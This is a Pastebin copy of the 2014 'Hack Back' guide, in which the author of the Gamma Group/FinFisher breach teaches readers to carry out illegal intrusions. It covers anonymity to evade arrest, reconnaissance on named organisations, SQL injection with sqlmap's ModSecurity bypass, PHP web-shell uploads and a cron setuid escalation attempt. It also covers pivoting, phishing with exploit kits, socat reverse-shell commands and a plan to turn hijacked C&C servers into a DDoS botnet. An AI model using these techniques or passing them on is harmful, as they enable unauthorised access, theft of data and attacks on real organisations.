daily pastebin goal
20%
SHARE
TWEET

Untitled

a guest Aug 8th, 2014 246,562 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.                 _   _            _      ____             _    _
  2.                | | | | __ _  ___| | __ | __ )  __ _  ___| | _| |
  3.                | |_| |/ _` |/ __| |/ / |  _ \ / _` |/ __| |/ / |
  4.                |  _  | (_| | (__|   <  | |_) | (_| | (__|   <|_|
  5.                |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
  6.                                                  
  7.      A DIY Guide for those without the patience to wait for whistleblowers
  8.  
  9.  
  10. --[ 1 ]-- Introduction
  11.  
  12. I'm not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz
  13. it took to 0wn Gamma. I'm writing this to demystify hacking, to show how simple
  14. it is, and to hopefully inform and inspire you to go out and hack shit. If you
  15. have no experience with programming or hacking, some of the text below might
  16. look like a foreign language. Check the resources section at the end to help you
  17. get started. And trust me, once you've learned the basics you'll realize this
  18. really is easier than filing a FOIA request.
  19.  
  20.  
  21. --[ 2 ]-- Staying Safe
  22.  
  23. This is illegal, so you'll need to take same basic precautions:
  24.  
  25. 1) Make a hidden encrypted volume with Truecrypt 7.1a [0]
  26. 2) Inside the encrypted volume install Whonix [1]
  27. 3) (Optional) While just having everything go over Tor thanks to Whonix is
  28.    probably sufficient, it's better to not use an internet connection connected
  29.    to your name or address. A cantenna, aircrack, and reaver can come in handy
  30.    here.
  31.  
  32. [0] https://truecrypt.ch/downloads/
  33. [1] https://www.whonix.org/wiki/Download#Install_Whonix
  34.  
  35. As long as you follow common sense like never do anything hacking related
  36. outside of Whonix, never do any of your normal computer usage inside Whonix,
  37. never mention any information about your real life when talking with other
  38. hackers, and never brag about your illegal hacking exploits to friends in real
  39. life, then you can pretty much do whatever you want with no fear of being v&.
  40.  
  41. NOTE: I do NOT recommend actually hacking directly over Tor. While Tor is usable
  42. for some things like web browsing, when it comes to using hacking tools like
  43. nmap, sqlmap, and nikto that are making thousands of requests, they will run
  44. very slowly over Tor. Not to mention that you'll want a public IP address to
  45. receive connect back shells. I recommend using servers you've hacked or a VPS
  46. paid with bitcoin to hack from. That way only the low bandwidth text interface
  47. between you and the server is over Tor. All the commands you're running will
  48. have a nice fast connection to your target.
  49.  
  50.  
  51. --[ 3 ]-- Mapping out the target
  52.  
  53. Basically I just repeatedly use fierce [0], whois lookups on IP addresses and
  54. domain names, and reverse whois lookups to find all IP address space and domain
  55. names associated with an organization.
  56.  
  57. [0] http://ha.ckers.org/fierce/
  58.  
  59. For an example let's take Blackwater. We start out knowing their homepage is at
  60. academi.com. Running fierce.pl -dns academi.com we find the subdomains:
  61. 67.238.84.228   email.academi.com
  62. 67.238.84.242   extranet.academi.com
  63. 67.238.84.240   mail.academi.com
  64. 67.238.84.230   secure.academi.com
  65. 67.238.84.227   vault.academi.com
  66. 54.243.51.249   www.academi.com
  67.  
  68. Now we do whois lookups and find the homepage of www.academi.com is hosted on
  69. Amazon Web Service, while the other IPs are in the range:
  70. NetRange:       67.238.84.224 - 67.238.84.255
  71. CIDR:           67.238.84.224/27
  72. CustName:       Blackwater USA
  73. Address:        850 Puddin Ridge Rd
  74.  
  75. Doing a whois lookup on academi.com reveals it's also registered to the same
  76. address, so we'll use that as a string to search with for the reverse whois
  77. lookups. As far as I know all the actual reverse whois lookup services cost
  78. money, so I just cheat with google:
  79. "850 Puddin Ridge Rd" inurl:ip-address-lookup
  80. "850 Puddin Ridge Rd" inurl:domaintools
  81.  
  82. Now run fierce.pl -range on the IP ranges you find to lookup dns names, and
  83. fierce.pl -dns on the domain names to find subdomains and IP addresses. Do more
  84. whois lookups and repeat the process until you've found everything.
  85.  
  86. Also just google the organization and browse around its websites. For example on
  87. academi.com we find links to a careers portal, an online store, and an employee
  88. resources page, so now we have some more:
  89. 54.236.143.203  careers.academi.com
  90. 67.132.195.12   academiproshop.com
  91. 67.238.84.236   te.academi.com
  92. 67.238.84.238   property.academi.com
  93. 67.238.84.241   teams.academi.com
  94.  
  95. If you repeat the whois lookups and such you'll find academiproshop.com seems to
  96. not be hosted or maintained by Blackwater, so scratch that off the list of
  97. interesting IPs/domains.
  98.  
  99. In the case of FinFisher what led me to the vulnerable finsupport.finfisher.com
  100. was simply a whois lookup of finfisher.com which found it registered to the name
  101. "FinFisher GmbH". Googling for:
  102. "FinFisher GmbH" inurl:domaintools
  103. finds gamma-international.de, which redirects to finsupport.finfisher.com
  104.  
  105. ...so now you've got some idea how I map out a target.
  106. This is actually one of the most important parts, as the larger the attack
  107. surface that you are able to map out, the easier it will be to find a hole
  108. somewhere in it.
  109.  
  110.  
  111. --[ 4 ]-- Scanning & Exploiting
  112.  
  113. Scan all the IP ranges you found with nmap to find all services running. Aside
  114. from a standard port scan, scanning for SNMP is underrated.
  115.  
  116. Now for each service you find running:
  117.  
  118. 1) Is it exposing something it shouldn't? Sometimes companies will have services
  119. running that require no authentication and just assume it's safe because the url
  120. or IP to access it isn't public. Maybe fierce found a git subdomain and you can
  121. go to git.companyname.come/gitweb/ and browse their source code.
  122.  
  123. 2) Is it horribly misconfigured? Maybe they have an ftp server that allows
  124. anonymous read or write access to an important directory. Maybe they have a
  125. database server with a blank admin password (lol stratfor). Maybe their embedded
  126. devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer's
  127. default password.
  128.  
  129. 3) Is it running an old version of software vulnerable to a public exploit?
  130.  
  131.  
  132. Webservers deserve their own category. For any webservers, including ones nmap
  133. will often find running on nonstandard ports, I usually:
  134.  
  135. 1) Browse them. Especially on subdomains that fierce finds which aren't intended
  136. for public viewing like test.company.com or dev.company.com you'll often find
  137. interesting stuff just by looking at them.
  138.  
  139. 2) Run nikto [0]. This will check for things like webserver/.svn/,
  140. webserver/backup/, webserver/phpinfo.php, and a few thousand other common
  141. mistakes and misconfigurations.
  142.  
  143. 3) Identify what software is being used on the website. WhatWeb is useful [1]
  144.  
  145. 4) Depending on what software the website is running, use more specific tools
  146. like wpscan [2], CMS-Explorer [3], and Joomscan [4].
  147.  
  148. First try that against all services to see if any have a misconfiguration,
  149. publicly known vulnerability, or other easy way in. If not, it's time to move
  150. on to finding a new vulnerability:
  151.  
  152. 5) Custom coded web apps are more fertile ground for bugs than large widely used
  153. projects, so try those first. I use ZAP [5], and some combination of its
  154. automated tests along with manually poking around with the help of its
  155. intercepting proxy.
  156.  
  157. 6) For the non-custom software they're running, get a copy to look at.  If it's
  158. free software you can just download it. If it's proprietary you can usually
  159. pirate it. If it's proprietary and obscure enough that you can't pirate it you
  160. can buy it (lame) or find other sites running the same software using google,
  161. find one that's easier to hack, and get a copy from them.
  162.  
  163. [0] http://www.cirt.net/nikto2
  164. [1] http://www.morningstarsecurity.com/research/whatweb
  165. [2] http://wpscan.org/
  166. [3] https://code.google.com/p/cms-explorer/
  167. [4] http://sourceforge.net/projects/joomscan/
  168. [5] https://code.google.com/p/zaproxy/
  169.  
  170.  
  171. For finsupport.finfisher.com the process was:
  172.  
  173. * Start nikto running in the background.
  174.  
  175. * Visit the website. See nothing but a login page. Quickly check for sqli in the
  176.   login form.
  177.  
  178. * See if WhatWeb knows anything about what software the site is running.
  179.  
  180. * WhatWeb doesn't recognize it, so the next question I want answered is if this
  181.   is a custom website by Gamma, or if there are other websites using the same
  182.   software.
  183.  
  184. * I view the page source to find a URL I can search on (index.php isn't
  185.   exactly unique to this software). I pick Scripts/scripts.js.php, and google:
  186.   allinurl:"Scripts/scripts.js.php"
  187.  
  188. * I find there's a handful of other sites using the same software, all coded by
  189.   the same small webdesign firm. It looks like each site is custom coded but
  190.   they share a lot of code. So I hack a couple of them to get a collection of
  191.   code written by the webdesign firm.
  192.  
  193. At this point I can see the news stories that journalists will write to drum
  194. up views: "In a sophisticated, multi-step attack, hackers first compromised a
  195. web design firm in order to acquire confidential data that would aid them in
  196. attacking Gamma Group..."
  197.  
  198. But it's really quite easy, done almost on autopilot once you get the hang of
  199. it. It took all of a couple minutes to:
  200.  
  201. * google allinurl:"Scripts/scripts.js.php" and find the other sites
  202.  
  203. * Notice they're all sql injectable in the first url parameter I try.
  204.  
  205. * Realize they're running Apache ModSecurity so I need to use sqlmap [0] with
  206.   the option --tamper='tamper/modsecurityversioned.py'
  207.  
  208. * Acquire the admin login information, login and upload a php shell [1] (the
  209.   check for allowable file extensions was done client side in javascript), and
  210.   download the website's source code.
  211.  
  212. [0] http://sqlmap.org/
  213. [1] https://epinna.github.io/Weevely/
  214.  
  215. Looking through the source code they might as well have named it Damn Vulnerable
  216. Web App v2 [0]. It's got sqli, LFI, file upload checks done client side in
  217. javascript, and if you're unauthenticated the admin page just sends you back to
  218. the login page with a Location header, but you can have your intercepting proxy
  219. filter the Location header out and access it just fine.
  220.  
  221. [0] http://www.dvwa.co.uk/
  222.  
  223. Heading back over to the finsupport site, the admin /BackOffice/ page returns
  224. 403 Forbidden, and I'm having some issues with the LFI, so I switch to using the
  225. sqli (it's nice to have a dozen options to choose from). The other sites by the
  226. web designer all had an injectable print.php, so some quick requests to:
  227. https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1
  228. https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
  229. reveal that finsupport also has print.php and it is injectable. And it's
  230. database admin! For MySQL this means you can read and write files. It turns out
  231. the site has magicquotes enabled, so I can't use INTO OUTFILE to write files.
  232. But I can use a short script that uses sqlmap --file-read to get the php source
  233. for a URL, and a normal web request to get the HTML, and then finds files
  234. included or required in the php source, and finds php files linked in the HTML,
  235. to recursively download the source to the whole site.
  236.  
  237. Looking through the source, I see customers can attach a file to their support
  238. tickets, and there's no check on the file extension. So I pick a username and
  239. password out of the customer database, create a support request with a php shell
  240. attached, and I'm in!
  241.  
  242.  
  243. --[ 5 ]-- (fail at) Escalating
  244.  
  245.  ___________
  246. < got r00t? >
  247.  -----------
  248.         \   ^__^
  249.          \  (oo)\_______
  250.             (__)\       )\/\
  251.                 ||----w |
  252.                 ||     ||
  253.             ^^^^^^^^^^^^^^^^
  254.  
  255. Root over 50% of linux servers you encounter in the wild with two easy scripts,
  256. Linux_Exploit_Suggester [0], and unix-privesc-check [1].
  257.  
  258. [0] https://github.com/PenturaLabs/Linux_Exploit_Suggester
  259. [1] https://code.google.com/p/unix-privesc-check/
  260.  
  261. finsupport was running the latest version of Debian with no local root exploits,
  262. but unix-privesc-check returned:
  263. WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user
  264. www-data can write to /etc/cron.hourly/mgmtlicensestatus
  265. WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data
  266. can write to /etc/cron.hourly/webalizer
  267.  
  268. so I add to /etc/cron.hourly/webalizer:
  269. chown root:root /path/to/my_setuid_shell
  270. chmod 04755 /path/to/my_setuid_shell
  271.  
  272. wait an hour, and ....nothing. Turns out that while the cron process is running
  273. it doesn't seem to be actually running cron jobs. Looking in the webalizer
  274. directory shows it didn't update stats the previous month. Apparently after
  275. updating the timezone cron will sometimes run at the wrong time or sometimes not
  276. run at all and you need to restart cron after changing the timezone. ls -l
  277. /etc/localtime shows the timezone got updated June 6, the same time webalizer
  278. stopped recording stats, so that's probably the issue. At any rate, the only
  279. thing this server does is host the website, so I already have access to
  280. everything interesting on it. Root wouldn't get much of anything new, so I move
  281. on to the rest of the network.
  282.  
  283.  
  284. --[ 6 ]-- Pivoting
  285.  
  286. The next step is to look around the local network of the box you hacked.  This
  287. is pretty much the same as the first Scanning & Exploiting step, except that
  288. from behind the firewall many more interesting services will be exposed. A
  289. tarball containing a statically linked copy of nmap and all its scripts that you
  290. can upload and run on any box is very useful for this. The various nfs-* and
  291. especially smb-* scripts nmap has will be extremely useful.
  292.  
  293. The only interesting thing I could get on finsupport's local network was another
  294. webserver serving up a folder called 'qateam' containing their mobile malware.
  295.  
  296.  
  297. --[ 7 ]-- Have Fun
  298.  
  299. Once you're in their networks, the real fun starts. Just use your imagination.
  300. While I titled this a guide for wannabe whistleblowers, there's no reason to
  301. limit yourself to leaking documents. My original plan was to:
  302. 1) Hack Gamma and obtain a copy of the FinSpy server software
  303. 2) Find vulnerabilities in FinSpy server.
  304. 3) Scan the internet for, and hack, all FinSpy C&C servers.
  305. 4) Identify the groups running them.
  306. 5) Use the C&C server to upload and run a program on all targets telling them
  307.    who was spying on them.
  308. 6) Use the C&C server to uninstall FinFisher on all targets.
  309. 7) Join the former C&C servers into a botnet to DDoS Gamma Group.
  310.  
  311. It was only after failing to fully hack Gamma and ending up with some
  312. interesting documents but no copy of the FinSpy server software that I had to
  313. make due with the far less lulzy backup plan of leaking their stuff while
  314. mocking them on twitter.
  315. Point your GPUs at FinSpy-PC+Mobile-2012-07-12-Final.zip and crack the password
  316. already so I can move on to step 2!
  317.  
  318.  
  319. --[ 8 ]-- Other Methods
  320.  
  321. The general method I outlined above of scan, find vulnerabilities, and exploit
  322. is just one way to hack, probably better suited to those with a background in
  323. programming. There's no one right way, and any method that works is as good as
  324. any other. The other main ways that I'll state without going into detail are:
  325.  
  326. 1) Exploits in web browers, java, flash, or microsoft office, combined with
  327. emailing employees with a convincing message to get them to open the link or
  328. attachment, or hacking a web site frequented by the employees and adding the
  329. browser/java/flash exploit to that.
  330. This is the method used by most of the government hacking groups, but you don't
  331. need to be a government with millions to spend on 0day research or subscriptions
  332. to FinSploit or VUPEN to pull it off. You can get a quality russian exploit kit
  333. for a couple thousand, and rent access to one for much less. There's also
  334. metasploit browser autopwn, but you'll probably have better luck with no
  335. exploits and a fake flash updater prompt.
  336.  
  337. 2) Taking advantage of the fact that people are nice, trusting, and helpful 95%
  338. of the time.
  339. The infosec industry invented a term to make this sound like some sort of
  340. science: "Social Engineering". This is probably the way to go if you don't know
  341. too much about computers, and it really is all it takes to be a successful
  342. hacker [0].
  343.  
  344. [0] https://www.youtube.com/watch?v=DB6ywr9fngU
  345.  
  346.  
  347. --[ 9 ]-- Resources
  348.  
  349. Links:
  350.  
  351. * https://www.pentesterlab.com/exercises/
  352. * http://overthewire.org/wargames/
  353. * http://www.hackthissite.org/
  354. * http://smashthestack.org/
  355. * http://www.win.tue.nl/~aeb/linux/hh/hh.html
  356. * http://www.phrack.com/
  357. * http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot
  358. * http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash
  359. * https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/
  360. * https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers
  361.   (all his other blog posts are great too)
  362. * https://www.corelan.be/ (start at Exploit writing tutorial part 1)
  363. * http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
  364.   One trick it leaves out is that on most systems the apache access log is
  365.   readable only by root, but you can still include from /proc/self/fd/10 or
  366.   whatever fd apache opened it as. It would also be more useful if it mentioned
  367.   what versions of php the various tricks were fixed in.
  368. * http://www.dest-unreach.org/socat/
  369.   Get usable reverse shells with a statically linked copy of socat to drop on
  370.   your target and:
  371.   target$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM
  372.   host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM
  373.   It's also useful for setting up weird pivots and all kinds of other stuff.
  374.  
  375. Books:
  376.  
  377. * The Web Application Hacker's Handbook
  378. * Hacking: The Art of Exploitation
  379. * The Database Hacker's Handbook
  380. * The Art of Software Security Assessment
  381. * A Bug Hunter's Diary
  382. * Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier
  383. * TCP/IP Illustrated
  384.  
  385. Aside from the hacking specific stuff almost anything useful to a system
  386. administrator for setting up and administering networks will also be useful for
  387. exploring them. This includes familiarity with the windows command prompt and unix
  388. shell, basic scripting skills, knowledge of ldap, kerberos, active directory,
  389. networking, etc.
  390.  
  391.  
  392. --[ 10 ]-- Outro
  393.  
  394. You'll notice some of this sounds exactly like what Gamma is doing. Hacking is a
  395. tool. It's not selling hacking tools that makes Gamma evil. It's who their
  396. customers are targeting and with what purpose that makes them evil. That's not
  397. to say that tools are inherently neutral. Hacking is an offensive tool. In the
  398. same way that guerrilla warfare makes it harder to occupy a country, whenever
  399. it's cheaper to attack than to defend it's harder to maintain illegitimate
  400. authority and inequality. So I wrote this to try to make hacking easier and more
  401. accessible. And I wanted to show that the Gamma Group hack really was nothing
  402. fancy, just standard sqli, and that you do have the ability to go out and take
  403. similar action.
  404.  
  405. Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea
  406. Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned
  407. hackers, dissidents, and criminals!
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top